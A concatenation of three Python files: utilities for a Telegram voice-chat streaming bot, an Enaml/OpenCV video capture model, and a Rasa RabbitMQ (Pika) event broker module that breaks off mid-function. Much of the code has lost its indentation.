InlineKeyboardButton('🗑 Close', callback_data='close'),
]
]
)
return reply_markup
async def delete_messages(messages):
await asyncio.sleep(Config.DELAY)
for msg in messages:
try:
if msg.chat.type == "supergroup":
await msg.delete()
except:
pass
#Database Config
async def sync_to_db():
if Config.DATABASE_URI:
await check_db()
await db.edit_config("ADMINS", Config.ADMINS)
await db.edit_config("IS_VIDEO", Config.IS_VIDEO)
await db.edit_config("IS_LOOP", Config.IS_LOOP)
await db.edit_config("REPLY_PM", Config.REPLY_PM)
await db.edit_config("ADMIN_ONLY", Config.ADMIN_ONLY)
await db.edit_config("SHUFFLE", Config.SHUFFLE)
await db.edit_config("EDIT_TITLE", Config.EDIT_TITLE)
await db.edit_config("CHAT", Config.CHAT)
await db.edit_config("SUDO", Config.SUDO)
await db.edit_config("REPLY_MESSAGE", Config.REPLY_MESSAGE)
await db.edit_config("LOG_GROUP", Config.LOG_GROUP)
await db.edit_config("STREAM_URL", Config.STREAM_URL)
await db.edit_config("DELAY", Config.DELAY)
await db.edit_config("SCHEDULED_STREAM", Config.SCHEDULED_STREAM)
await db.edit_config("SCHEDULE_LIST", Config.SCHEDULE_LIST)
await db.edit_config("IS_VIDEO_RECORD", Config.IS_VIDEO_RECORD)
await db.edit_config("IS_RECORDING", Config.IS_RECORDING)
await db.edit_config("WAS_RECORDING", Config.WAS_RECORDING)
await db.edit_config("PORTRAIT", Config.PORTRAIT)
await db.edit_config("RECORDING_DUMP", Config.RECORDING_DUMP)
await db.edit_config("RECORDING_TITLE", Config.RECORDING_TITLE)
await db.edit_config("HAS_SCHEDULE", Config.HAS_SCHEDULE)
async def sync_from_db():
if Config.DATABASE_URI:
await check_db()
Config.ADMINS = await db.get_config("ADMINS")
Config.IS_VIDEO = await db.get_config("IS_VIDEO")
Config.IS_LOOP = await db.get_config("IS_LOOP")
Config.REPLY_PM = await db.get_config("REPLY_PM")
Config.ADMIN_ONLY = await db.get_config("ADMIN_ONLY")
Config.SHUFFLE = await db.get_config("SHUFFLE")
Config.EDIT_TITLE = await db.get_config("EDIT_TITLE")
Config.CHAT = int(await db.get_config("CHAT"))
Config.playlist = await db.get_playlist()
Config.LOG_GROUP = await db.get_config("LOG_GROUP")
Config.SUDO = await db.get_config("SUDO")
Config.REPLY_MESSAGE = await db.get_config("REPLY_MESSAGE")
Config.DELAY = await db.get_config("DELAY")
Config.STREAM_URL = await db.get_config("STREAM_URL")
Config.SCHEDULED_STREAM = await db.get_config("SCHEDULED_STREAM")
Config.SCHEDULE_LIST = await db.get_config("SCHEDULE_LIST")
Config.IS_VIDEO_RECORD = await db.get_config('IS_VIDEO_RECORD')
Config.IS_RECORDING = await db.get_config("IS_RECORDING")
Config.WAS_RECORDING = await db.get_config('WAS_RECORDING')
Config.PORTRAIT = await db.get_config("PORTRAIT")
Config.RECORDING_DUMP = await db.get_config("RECORDING_DUMP")
Config.RECORDING_TITLE = await db.get_config("RECORDING_TITLE")
Config.HAS_SCHEDULE = await db.get_config("HAS_SCHEDULE")
async def add_to_db_playlist(song):
if Config.DATABASE_URI:
song_={str(k):v for k,v in song.items()}
db.add_to_playlist(song[5], song_)
async def clear_db_playlist(song=None, all=False):
if Config.DATABASE_URI:
if all:
await db.clear_playlist()
else:
await db.del_song(song[5])
async def check_db():
if not await db.is_saved("ADMINS"):
db.add_config("ADMINS", Config.ADMINS)
if not await db.is_saved("IS_VIDEO"):
db.add_config("IS_VIDEO", Config.IS_VIDEO)
if not await db.is_saved("IS_LOOP"):
db.add_config("IS_LOOP", Config.IS_LOOP)
if not await db.is_saved("REPLY_PM"):
db.add_config("REPLY_PM", Config.REPLY_PM)
if not await db.is_saved("ADMIN_ONLY"):
db.add_config("ADMIN_ONLY", Config.ADMIN_ONLY)
if not await db.is_saved("SHUFFLE"):
db.add_config("SHUFFLE", Config.SHUFFLE)
if not await db.is_saved("EDIT_TITLE"):
db.add_config("EDIT_TITLE", Config.EDIT_TITLE)
if not await db.is_saved("CHAT"):
db.add_config("CHAT", Config.CHAT)
if not await db.is_saved("SUDO"):
db.add_config("SUDO", Config.SUDO)
if not await db.is_saved("REPLY_MESSAGE"):
db.add_config("REPLY_MESSAGE", Config.REPLY_MESSAGE)
if not await db.is_saved("STREAM_URL"):
db.add_config("STREAM_URL", Config.STREAM_URL)
if not await db.is_saved("DELAY"):
db.add_config("DELAY", Config.DELAY)
if not await db.is_saved("LOG_GROUP"):
db.add_config("LOG_GROUP", Config.LOG_GROUP)
if not await db.is_saved("SCHEDULED_STREAM"):
db.add_config("SCHEDULED_STREAM", Config.SCHEDULED_STREAM)
if not await db.is_saved("SCHEDULE_LIST"):
db.add_config("SCHEDULE_LIST", Config.SCHEDULE_LIST)
if not await db.is_saved("IS_VIDEO_RECORD"):
db.add_config("IS_VIDEO_RECORD", Config.IS_VIDEO_RECORD)
if not await db.is_saved("PORTRAIT"):
db.add_config("PORTRAIT", Config.PORTRAIT)
if not await db.is_saved("IS_RECORDING"):
db.add_config("IS_RECORDING", Config.IS_RECORDING)
if not await db.is_saved('WAS_RECORDING'):
db.add_config('WAS_RECORDING', Config.WAS_RECORDING)
if not await db.is_saved("RECORDING_DUMP"):
db.add_config("RECORDING_DUMP", Config.RECORDING_DUMP)
if not await db.is_saved("RECORDING_TITLE"):
db.add_config("RECORDING_TITLE", Config.RECORDING_TITLE)
if not await db.is_saved('HAS_SCHEDULE'):
db.add_config("HAS_SCHEDULE", Config.HAS_SCHEDULE)
async def progress_bar(current, zero, total, start, msg):
now = time.time()
if total == 0:
return
if round((now - start) % 3) == 0 or current == total:
speed = current / (now - start)
percentage = current * 100 / total
time_to_complete = round(((total - current) / speed)) * 1000
time_to_complete = TimeFormatter(time_to_complete)
progressbar = "[{0}{1}]".format(\
''.join(["▰" for i in range(math.floor(percentage / 5))]),
''.join(["▱" for i in range(20 - math.floor(percentage / 5))])
)
current_message = f"**Downloading** {round(percentage, 2)}% \n{progressbar}\n⚡️ **Speed**: {humanbytes(speed)}/s\n⬇️ **Downloaded**: {humanbytes(current)} / {humanbytes(total)}\n🕰 **Time Left**: {time_to_complete}"
if msg:
try:
await msg.edit(text=current_message)
except:
pass
LOGGER.info(f"Downloading {round(percentage, 2)}% ")
@timeout(10)
def is_audio(file):
try:
k=ffmpeg.probe(file)['streams']
if k:
return True
else:
return False
except KeyError:
return False
except Exception as e:
LOGGER.error(f"Stream Unsupported {e} ")
return False
@timeout(10)#wait for maximum 10 sec, temp fix for ffprobe
def get_height_and_width(file):
try:
k=ffmpeg.probe(file)['streams']
width=None
height=None
for f in k:
try:
width=int(f["width"])
height=int(f["height"])
if height >= 256:
break
except KeyError:
continue
except:
LOGGER.error("Error, This stream is not supported.")
width, height = False, False
return width, height
@timeout(10)
def get_duration(file):
try:
total=ffmpeg.probe(file)['format']['duration']
return total
except:
return 0
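# A minimal sketch (not part of the original bot) showing how the ffprobe helpers above
# could be used to inspect a local file before queueing it; 'sample.mp4' is a placeholder path.
def _probe_demo(path="sample.mp4"):
    if is_audio(path):
        width, height = get_height_and_width(path)
        LOGGER.info(f"Playable stream: duration={get_duration(path)}s, size={width}x{height}")
    else:
        LOGGER.info("No usable streams found in file")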
def humanbytes(size):
if not size:
return ""
power = 2**10
n = 0
Dic_powerN = {0: ' ', 1: 'K', 2: 'M', 3: 'G', 4: 'T'}
while size > power:
size /= power
n += 1
return str(round(size, 2)) + " " + Dic_powerN[n] + 'B'
def get_player_string():
now = time.time()
data=Config.DATA.get('FILE_DATA')
dur=int(float(data.get('dur', 0)))
start = int(Config.DUR.get('TIME', 0))
played = round(now-start)
if played == 0:
played += 1
if dur == 0:
dur=played
played = round(now-start)
percentage = played * 100 / dur
progressbar = "▷ {0}◉{1}".format(\
''.join(["━" for i in range(math.floor(percentage / 5))]),
''.join(["─" for i in range(20 - math.floor(percentage / 5))])
)
final=f"{convert(played)} {progressbar} {convert(dur)}"
return final
def get_volume_string():
current = int(Config.VOLUME)
if current == 0:
current += 1
if Config.MUTED:
e='🔇'
elif 0 < current < 75:
e="🔈"
elif 75 <= current < 150:
e="🔉"
else:
e="🔊"
percentage = current * 100 / 200
progressbar = "🎙 {0}◉{1}".format(\
''.join(["━" for i in range(math.floor(percentage / 5))]),
''.join(["─" for i in range(20 - math.floor(percentage / 5))])
)
final=f" {str(current)} / {str(200)} {progressbar} {e}"
return final
def TimeFormatter(milliseconds: int) -> str:
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = ((str(days) + " days, ") if days else "") + \
((str(hours) + " hours, ") if hours else "") + \
((str(minutes) + " min, ") if minutes else "") + \
((str(seconds) + " sec, ") if seconds else "") + \
((str(milliseconds) + " millisec, ") if milliseconds else "")
return tmp[:-2]
def set_config(value):
    # Toggle helper: returns the negation of the current boolean value.
    return not value
def convert(seconds):
seconds = seconds % (24 * 3600)
hour = seconds // 3600
seconds %= 3600
minutes = seconds // 60
seconds %= 60
return "%d:%02d:%02d" % (hour, minutes, seconds)
def get_pause(status):
    return "Resume" if status else "Pause"
def stop_and_restart():
os.system("git pull")
time.sleep(10)
os.execl(sys.executable, sys.executable, *sys.argv)
def get_image(title, pic, dur="Live"):
newimage = "converted.jpg"
image = Image.open(pic)
draw = ImageDraw.Draw(image)
font = ImageFont.truetype('font.ttf', 70)
title = title[0:30]
MAX_W = 1790
dur=convert(int(float(dur)))
if dur=="0:00:00":
dur = "Live Stream"
para=[f'Playing : {title}', f'Duration: {dur}']
current_h, pad = 450, 20
for line in para:
w, h = draw.textsize(line, font=font)
draw.text(((MAX_W - w) / 2, current_h), line, font=font, fill ="skyblue")
current_h += h + pad
image.save(newimage)
return newimage
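# Example invocation of the thumbnail generator above (a sketch; 'background.jpg' is a
# placeholder image, and 'font.ttf' must exist next to the bot as get_image assumes).
def _thumbnail_demo():
    return get_image("My Song Title", "background.jpg", dur="213.4")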
async def edit_config(var, value):
if var == "STARTUP_STREAM":
Config.STREAM_URL = value
elif var == "CHAT":
Config.CHAT = int(value)
elif var == "LOG_GROUP":
Config.LOG_GROUP = int(value)
elif var == "DELAY":
Config.DELAY = int(value)
elif var == "REPLY_MESSAGE":
Config.REPLY_MESSAGE = value
elif var == "RECORDING_DUMP":
Config.RECORDING_DUMP = value
await sync_to_db()
async def update():
    await leave_call()
    if Config.HEROKU_APP:
        Config.HEROKU_APP.restart()
    else:
        # Pass the callable itself; calling it here would block instead of running in the thread.
        Thread(
            target=stop_and_restart
        ).start()
async def startup_check():
    if Config.LOG_GROUP:
        try:
            k = await bot.get_chat_member(Config.LOG_GROUP, Config.BOT_USERNAME)
        except ValueError:
            LOGGER.error(f"LOG_GROUP var found, but @{Config.BOT_USERNAME} is not a member of that group.")
            return False
    if Config.RECORDING_DUMP:
        try:
            k = await USER.get_chat_member(Config.RECORDING_DUMP, Config.USER_ID)
        except ValueError:
            LOGGER.error(f"RECORDING_DUMP var found, but @{Config.USER_ID} is not a member of that group/channel.")
            return False
        if k.status not in ["administrator", "creator"]:
            LOGGER.error(f"RECORDING_DUMP var found, but @{Config.USER_ID} is not an admin of that group/channel.")
            return False
    if Config.CHAT:
        try:
            k = await USER.get_chat_member(Config.CHAT, Config.USER_ID)
            if k.status not in ["administrator", "creator"]:
                LOGGER.warning(f"{Config.USER_ID} is not an admin in {Config.CHAT}; it is recommended to make the user account an admin.")
            elif k.status in ["administrator", "creator"] and not k.can_manage_voice_chats:
                LOGGER.warning(f"{Config.USER_ID} does not have the right to manage voice chats; it is recommended to promote the account with this right.")
        except ValueError:
            LOGGER.error(f"The user account used to generate the SESSION_STRING was not found in CHAT ({Config.CHAT}).")
            return False
        try:
            k = await bot.get_chat_member(Config.CHAT, Config.BOT_USERNAME)
            if k.status != "administrator":
                LOGGER.warning(f"{Config.BOT_USERNAME} is not an admin in {Config.CHAT}; it is recommended to run the bot as admin.")
        except ValueError:
            LOGGER.warning(f"Bot was not found in CHAT; it is recommended to add {Config.BOT_USERNAME} to {Config.CHAT}.")
            pass
    if not Config.DATABASE_URI:
        LOGGER.warning("No DATABASE_URI found. It is recommended to use a database.")
    return True
|
enaml_video_model.py
|
from atom.api import Atom, Typed, Unicode, Int, Bool, Signal
from enaml.core.declarative import d_
from enaml.application import deferred_call
from time import sleep
from collections import deque
from threading import Thread
from numpy import ndarray
import numpy as np
from typing import Optional, Tuple
import os.path as p
from ._library import cv
CAP_PERIOD = 0.020 # capture period in seconds
def edit_frame(frame: ndarray, y: int) -> Tuple[ndarray, ndarray]:
"""
Parameters
----------
frame : (is row-major)
y
Returns
-------
(frame, cut)
"""
np.random.uniform(-1, 1, size=20000000)  # artificial CPU load: 20,000,000 samples (sized for roughly 6 cores)
cut = cv.cvtColor(frame[[y], :], cv.COLOR_BGR2GRAY)[0, :]
# Convert OpenCV colors to PyQtGraph colors
frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)
return frame, cut
class Model(Atom):
"""
Read: Просто читаю кадры и кладу в очередь через период (в отдельном потоке).
Период либо берется из свойств файла, либо константа (10 мс) - если мы не знаем свойств источника.
Edit: По таймеру, через (другой) период беру последний кадр из очереди и обрабатываю его (в основном потоке).
Out: После обработки сразу же вывожу (сразу же в том же куске кода).
Constructor parameters
----------------------
file : Unicode = ''
Video file path
device : Int = 0
OpenCV device ID used only if the file doesn't exist
"""
file = Unicode('')
device = Int(0)
captured_frames = Typed(deque)
edited_frames = Typed(deque)
y = d_(Int(0))
capturing = d_(Bool(True))
update = Signal()
def start_capturing(self):
"""
Starts the capturer and editor worker threads.
"""
self.captured_frames = deque()
self.edited_frames = deque()
if p.isfile(self.file):
capture = cv.VideoCapture(self.file)
period = 1 / capture.get(5)
else:
capture = cv.VideoCapture(self.device)
period = CAP_PERIOD
thread_capturer = Thread(target=worker_capturer, args=(capture, period, self))
thread_editor = Thread(target=worker_editor, args=(period / 2, self))
thread_capturer.daemon = True
thread_editor.daemon = True
thread_capturer.start()
thread_editor.start()
def frame_and_cut(self) -> Optional[Tuple[ndarray, ndarray]]:
"""
Pops (frame, cut) from a deque if there are more than one tuple inside.
Returns
-------
(frame, cut) or None
"""
if len(self.edited_frames) > 1:
frame, cut = self.edited_frames.pop()
return frame, cut
else:
return None
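# A minimal usage sketch (an illustration, not part of the original module): it assumes an
# Enaml application is running so that `deferred_call` can dispatch the `update` signal,
# and 'example.mp4' is a placeholder path.
def _model_demo():
    model = Model(file='example.mp4', device=0, y=100)
    model.start_capturing()         # spawns the capturer and editor daemon threads
    sleep(1.0)                      # give the workers time to fill the queues
    result = model.frame_and_cut()  # newest (frame, cut) pair, or None if not ready yet
    model.capturing = False         # signals both worker threads to stop
    return result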
def worker_capturer(capture, period: float, model: Model):
"""
Worker function for another thread that captures frames
and puts them to deque with constant period given.
Parameters
----------
capture : cv2.VideoCapture()
period : (in seconds)
model
"""
while model.capturing:
ret, frame = capture.read()
if frame is not None:
model.captured_frames.appendleft(frame)
sleep(period)
def worker_editor(period: float, model: Model):
"""
Worker function for another thread that edits frames and puts them
to deque. Edits the latest frame and takes a cut along X axis from it
(fixed Y coordinate).
Parameters
----------
period : (in seconds)
model
"""
while model.capturing:
frame = None
while len(model.captured_frames) > 1:
frame = model.captured_frames.pop()
if frame is not None:
frame, cut = edit_frame(frame, model.y)
model.edited_frames.appendleft((frame, cut))
deferred_call(model.update)
else:
sleep(period)
|
pika.py
|
import json
import logging
import os
import time
import typing
from collections import deque
from threading import Thread
from typing import Callable, Deque, Dict, Optional, Text, Union, Any, List, Tuple
from rasa.constants import (
DEFAULT_LOG_LEVEL_LIBRARIES,
ENV_LOG_LEVEL_LIBRARIES,
DOCS_URL_PIKA_EVENT_BROKER,
)
from rasa.core.brokers.broker import EventBroker
from rasa.utils.common import raise_warning
from rasa.utils.endpoints import EndpointConfig
from rasa.utils.io import DEFAULT_ENCODING
if typing.TYPE_CHECKING:
from pika.adapters.blocking_connection import BlockingChannel
from pika import SelectConnection, BlockingConnection, BasicProperties
from pika.channel import Channel
import pika
from pika.connection import Parameters, Connection
logger = logging.getLogger(__name__)
RABBITMQ_EXCHANGE = "rasa-exchange"
def initialise_pika_connection(
host: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: float = 5,
) -> "BlockingConnection":
"""Create a Pika `BlockingConnection`.
Args:
host: Pika host
username: username for authentication with Pika host
password: password for authentication with Pika host
port: port of the Pika host
connection_attempts: number of channel attempts before giving up
retry_delay_in_seconds: delay in seconds between channel attempts
Returns:
`pika.BlockingConnection` with provided parameters
"""
import pika
parameters = _get_pika_parameters(
host, username, password, port, connection_attempts, retry_delay_in_seconds
)
return pika.BlockingConnection(parameters)
def _get_pika_parameters(
host: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: float = 5,
) -> "Parameters":
"""Create Pika `Parameters`.
Args:
host: Pika host
username: username for authentication with Pika host
password: password for authentication with Pika host
port: port of the Pika host
connection_attempts: number of channel attempts before giving up
retry_delay_in_seconds: delay in seconds between channel attempts
Returns:
`pika.ConnectionParameters` which can be used to create a new connection to a
broker.
"""
import pika
if host.startswith("amqp"):
# user supplied an AMQP URL containing all the info
parameters = pika.URLParameters(host)
parameters.connection_attempts = connection_attempts
parameters.retry_delay = retry_delay_in_seconds
if username:
parameters.credentials = pika.PlainCredentials(username, password)
else:
# host seems to be just the host, so we use our parameters
parameters = pika.ConnectionParameters(
host,
port=port,
credentials=pika.PlainCredentials(username, password),
connection_attempts=connection_attempts,
# Wait between retries since
# it can take some time until
# RabbitMQ comes up.
retry_delay=retry_delay_in_seconds,
ssl_options=create_rabbitmq_ssl_options(host),
)
return parameters
def initialise_pika_select_connection(
parameters: "Parameters",
on_open_callback: Callable[["SelectConnection"], None],
on_open_error_callback: Callable[["SelectConnection", Text], None],
) -> "SelectConnection":
"""Create a non-blocking Pika `SelectConnection`.
Args:
parameters: Parameters which should be used to connect.
on_open_callback: Callback which is called when the connection was established.
on_open_error_callback: Callback which is called when connecting to the broker
failed.
Returns:
A callback-based connection to the RabbitMQ event broker.
"""
import pika
return pika.SelectConnection(
parameters,
on_open_callback=on_open_callback,
on_open_error_callback=on_open_error_callback,
)
def initialise_pika_channel(
host: Text,
queue: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: float = 5,
) -> "BlockingChannel":
"""Initialise a Pika channel with a durable queue.
Args:
host: Pika host.
queue: Pika queue to declare.
username: Username for authentication with Pika host.
password: Password for authentication with Pika host.
port: port of the Pika host.
connection_attempts: Number of channel attempts before giving up.
retry_delay_in_seconds: Delay in seconds between channel attempts.
Returns:
Pika `BlockingChannel` with declared queue.
"""
connection = initialise_pika_connection(
host, username, password, port, connection_attempts, retry_delay_in_seconds
)
return _declare_pika_channel_with_queue(connection, queue)
def _declare_pika_channel_with_queue(
connection: "BlockingConnection", queue: Text
) -> "BlockingChannel":
"""Declare a durable queue on Pika channel."""
channel = connection.channel()
channel.queue_declare(queue, durable=True)
return channel
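# A minimal consumer sketch for the durable queue declared above (illustration only; the
# host, credentials and queue name are placeholders rather than Rasa defaults).
def _consume_events_demo(host: Text = "localhost", queue: Text = "rasa_core_events") -> None:
    channel = initialise_pika_channel(host, queue, username="guest", password="guest")

    def _on_message(ch, method, properties, body) -> None:
        # Events are published as UTF-8 encoded JSON (see `PikaEventBroker.publish`).
        logger.info(json.loads(body.decode(DEFAULT_ENCODING)))

    channel.basic_consume(queue=queue, on_message_callback=_on_message, auto_ack=True)
    channel.start_consuming()  # blocks until interrupted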
def close_pika_channel(
channel: "Channel",
attempts: int = 1000,
time_between_attempts_in_seconds: float = 0.001,
) -> None:
"""Attempt to close Pika channel and wait until it is closed.
Args:
channel: Pika `Channel` to close.
attempts: How many times to try to confirm that the channel has indeed been
closed.
time_between_attempts_in_seconds: Wait time between attempts to confirm closed
state.
"""
from pika.exceptions import AMQPError
try:
channel.close()
logger.debug("Successfully initiated closing of Pika channel.")
except AMQPError:
logger.exception("Failed to initiate closing of Pika channel.")
while attempts:
if channel.is_closed:
logger.debug("Successfully closed Pika channel.")
return None
time.sleep(time_between_attempts_in_seconds)
attempts -= 1
logger.exception("Failed to close Pika channel.")
def close_pika_connection(connection: "Connection") -> None:
"""Attempt to close Pika connection."""
from pika.exceptions import AMQPError
try:
connection.close()
logger.debug("Successfully closed Pika connection with host.")
except AMQPError:
logger.exception("Failed to close Pika connection with host.")
class PikaEventBroker(EventBroker):
"""Pika-based event broker for publishing messages to RabbitMQ."""
def __init__(
self,
host: Text,
username: Text,
password: Text,
port: Union[int, Text] = 5672,
queues: Union[List[Text], Tuple[Text], Text, None] = ("rasa_core_events",),
should_keep_unpublished_messages: bool = True,
raise_on_failure: bool = False,
log_level: Union[Text, int] = os.environ.get(
ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
),
**kwargs: Any,
):
"""Initialise RabbitMQ event broker.
Args:
host: Pika host.
username: Username for authentication with Pika host.
password: Password for authentication with Pika host.
port: port of the Pika host.
queues: Pika queues to declare and publish to.
should_keep_unpublished_messages: Whether or not the event broker should
maintain a queue of unpublished messages to be published later in
case of errors.
raise_on_failure: Whether to raise an exception if publishing fails. If
`False`, keep retrying.
log_level: Logging level.
"""
logging.getLogger("pika").setLevel(log_level)
self.host = host
self.username = username
self.password = password
self.port = port
self.channel: Optional["Channel"] = None
self.queues = self._get_queues_from_args(queues, kwargs)
self.should_keep_unpublished_messages = should_keep_unpublished_messages
self.raise_on_failure = raise_on_failure
# List to store unpublished messages which hopefully will be published later
self._unpublished_messages: Deque[Text] = deque()
self._run_pika()
def __del__(self) -> None:
if self.channel:
close_pika_channel(self.channel)
close_pika_connection(self.channel.connection)
def close(self) -> None:
"""Close the pika channel and connection."""
self.__del__()
@property
def rasa_environment(self) -> Optional[Text]:
"""Get value of the `RASA_ENVIRONMENT` environment variable."""
return os.environ.get("RASA_ENVIRONMENT")
@staticmethod
def _get_queues_from_args(
queues_arg: Union[List[Text], Tuple[Text], Text, None], kwargs: Any,
) -> Union[List[Text], Tuple[Text]]:
"""Get queues for this event broker.
The preferred argument defining the RabbitMQ queues the `PikaEventBroker` should
publish to is `queues` (as of Rasa Open Source version 1.8.2). This function
ensures backwards compatibility with the old `queue` argument. This method
can be removed in the future, and `self.queues` should just receive the value of
the `queues` kwarg in the constructor.
Args:
queues_arg: Value of the supplied `queues` argument.
kwargs: Additional kwargs supplied to the `PikaEventBroker` constructor.
If `queues_arg` is not supplied, the `queue` kwarg will be used instead.
Returns:
Queues this event broker publishes to.
Raises:
`ValueError` if no valid `queue` or `queues` argument was found.
"""
queue_arg = kwargs.pop("queue", None)
if queue_arg:
raise_warning(
"Your Pika event broker config contains the deprecated `queue` key. "
"Please use the `queues` key instead.",
FutureWarning,
docs=DOCS_URL_PIKA_EVENT_BROKER,
)
if queues_arg and isinstance(queues_arg, (list, tuple)):
return queues_arg
if queues_arg and isinstance(queues_arg, str):
logger.debug(
f"Found a string value under the `queues` key of the Pika event broker "
f"config. Please supply a list of queues under this key, even if it is "
f"just a single one. See {DOCS_URL_PIKA_EVENT_BROKER}"
)
return [queues_arg]
if queue_arg and isinstance(queue_arg, str):
return [queue_arg]
if queue_arg:
return queue_arg # pytype: disable=bad-return-type
raise ValueError(
f"Could not initialise `PikaEventBroker` due to invalid "
f"`queues` or `queue` argument in constructor. See "
f"{DOCS_URL_PIKA_EVENT_BROKER}."
)
@classmethod
def from_endpoint_config(
cls, broker_config: Optional["EndpointConfig"]
) -> Optional["PikaEventBroker"]:
"""Initialise `PikaEventBroker` from `EndpointConfig`.
Args:
broker_config: `EndpointConfig` to read.
Returns:
`PikaEventBroker` if `broker_config` was supplied, else `None`.
"""
if broker_config is None:
return None
return cls(broker_config.url, **broker_config.kwargs)
def _run_pika(self) -> None:
parameters = _get_pika_parameters(
self.host, self.username, self.password, self.port
)
self._pika_connection = initialise_pika_select_connection(
parameters, self._on_open_connection, self._on_open_connection_error
)
# Run Pika io loop in extra thread so it's not blocking
self._run_pika_io_loop_in_thread()
def _on_open_connection(self, connection: "SelectConnection") -> None:
logger.debug(f"RabbitMQ connection to '{self.host}' was established.")
connection.channel(on_open_callback=self._on_channel_open)
def _on_open_connection_error(self, _, error: Text) -> None:
logger.warning(
f"Connecting to '{self.host}' failed with error '{error}'. Trying again."
)
def _on_channel_open(self, channel: "Channel") -> None:
logger.debug("RabbitMQ channel was opened. Declaring fanout exchange.")
# declare exchange of type 'fanout' in order to publish to multiple queues
# (https://www.rabbitmq.com/tutorials/amqp-concepts.html#exchange-fanout)
channel.exchange_declare(RABBITMQ_EXCHANGE, exchange_type="fanout")
for queue in self.queues:
channel.queue_declare(queue=queue, durable=True)
channel.queue_bind(exchange=RABBITMQ_EXCHANGE, queue=queue)
self.channel = channel
while self._unpublished_messages:
# Send unpublished messages
message = self._unpublished_messages.popleft()
self._publish(message)
logger.debug(
f"Published message from queue of unpublished messages. "
f"Remaining unpublished messages: {len(self._unpublished_messages)}."
)
def _run_pika_io_loop_in_thread(self) -> None:
thread = Thread(target=self._run_pika_io_loop, daemon=True)
thread.start()
def _run_pika_io_loop(self) -> None:
# noinspection PyUnresolvedReferences
self._pika_connection.ioloop.start()
def is_ready(
self, attempts: int = 1000, wait_time_between_attempts_in_seconds: float = 0.01,
) -> bool:
"""Spin until the pika channel is open.
It typically takes 50 ms or so for the pika channel to open. We'll wait up
to 10 seconds just in case.
Args:
attempts: Number of retries.
wait_time_between_attempts_in_seconds: Wait time between retries.
Returns:
`True` if the channel is available, `False` otherwise.
"""
while attempts:
if self.channel:
return True
time.sleep(wait_time_between_attempts_in_seconds)
attempts -= 1
return False
def publish(
self,
event: Dict[Text, Any],
retries: int = 60,
retry_delay_in_seconds: int = 5,
headers: Optional[Dict[Text, Text]] = None,
) -> None:
"""Publish `event` into Pika queue.
Args:
event: Serialised event to be published.
retries: Number of retries if publishing fails
retry_delay_in_seconds: Delay in seconds between retries.
headers: Message headers to append to the published message (key-value
dictionary). The headers can be retrieved in the consumer from the
`headers` attribute of the message's `BasicProperties`.
"""
body = json.dumps(event)
while retries:
try:
self._publish(body, headers)
return
except Exception as e:
logger.error(
f"Could not open Pika channel at host '{self.host}'. "
f"Failed with error: {e}"
)
self.channel = None
if self.raise_on_failure:
raise e
retries -= 1
time.sleep(retry_delay_in_seconds)
logger.error(f"Failed to publish Pika event on host '{self.host}':\n{body}")
def _get_message_properties(
self, headers: Optional[Dict[Text, Text]] = None
) -> "BasicProperties":
"""Create RabbitMQ message `BasicProperties`.
The `app_id` property is set to the value of `self.rasa_environment` if
present, and the message delivery mode is set to 2 (persistent). In
addition, the `headers` property is set if supplied.
Args:
headers: Message headers to add to the message properties of the
published message (key-value dictionary). The headers can be retrieved in
the consumer from the `headers` attribute of the message's
`BasicProperties`.
Returns:
`pika.spec.BasicProperties` with the `RASA_ENVIRONMENT` environment variable
as the properties' `app_id` value, `delivery_mode`=2 and `headers` as the
properties' headers.
"""
from pika.spec import BasicProperties
# make message persistent
kwargs = {"delivery_mode": 2}
if self.rasa_environment:
kwargs["app_id"] = self.rasa_environment
if headers:
kwargs["headers"] = headers
return BasicProperties(**kwargs)
def _basic_publish(
self, body: Text, headers: Optional[Dict[Text, Text]] = None
) -> None:
self.channel.basic_publish(
exchange=RABBITMQ_EXCHANGE,
routing_key="",
body=body.encode(DEFAULT_ENCODING),
properties=self._get_message_properties(headers),
)
logger.debug(
f"Published Pika events to exchange '{RABBITMQ_EXCHANGE}' on host "
f"'{self.host}':\n{body}"
)
def _publish(self, body: Text, headers: Optional[Dict[Text, Text]] = None) -> None:
if self._pika_connection.is_closed:
# Try to reset connection
self._run_pika()
self._basic_publish(body, headers)
elif not self.channel and self.should_keep_unpublished_messages:
logger.warning(
f"RabbitMQ channel has not been assigned. Adding message to "
f"list of unpublished messages and trying to publish them "
f"later. Current number of unpublished messages is "
f"{len(self._unpublished_messages)}."
)
self._unpublished_messages.append(body)
else:
self._basic_publish(body, headers)
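# A short publishing sketch (illustration only; the host, credentials and queue name below
# are placeholders rather than defaults for any particular deployment).
def _publish_event_demo() -> None:
    broker = PikaEventBroker("localhost", "guest", "guest", queues=["rasa_core_events"])
    if broker.is_ready():
        # `publish` serialises the dict to JSON and sends it via the fanout exchange.
        broker.publish({"event": "user", "text": "hello"})
    broker.close()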
def create_rabbitmq_ssl_options(
rabbitmq_host: Optional[Text] = None,
) -> Optional["pika.SSLOptions"]:
"""Create RabbitMQ SSL options.
Requires the following environment variables to be set:
RABBITMQ_SSL_CLIENT_CERTIFICATE - path to the SSL client certificate (required)
RABBITMQ_SSL_CLIENT_KEY - path to the SSL client key (required)
RABBITMQ_SSL_CA_FILE - path to the SSL CA file for verification (optional)
RABBITMQ_SSL_KEY_PASSWORD - SSL private key password (optional)
Details on how to enable RabbitMQ TLS support can be found here:
https://www.rabbitmq.com/ssl.html#enabling-tls
Args:
rabbitmq_host: RabbitMQ hostname
Returns:
Pika SSL context of type `pika.SSLOptions` if
the RABBITMQ_SSL_CLIENT_CERTIFICATE and RABBITMQ_SSL_CLIENT_KEY
environment variables are valid paths, else `None`.
"""
client_certificate_path = os.environ.get("RABBITMQ_SSL_CLIENT_CERTIFICATE")
client_key_path = os.environ.get("RABBITMQ_SSL_CLIENT_KEY")
if client_certificate_path and client_key_path:
import pika
import rasa.server
logger.debug(f"Configuring SSL context for RabbitMQ host '{rabbitmq_host}'.")
ca_file_path = os.environ.get("RABBITMQ_SSL_CA_FILE")
key_password = os.environ.get("RABBITMQ_SSL_KEY_PASSWORD")
ssl_context = rasa.server.create_ssl_context(
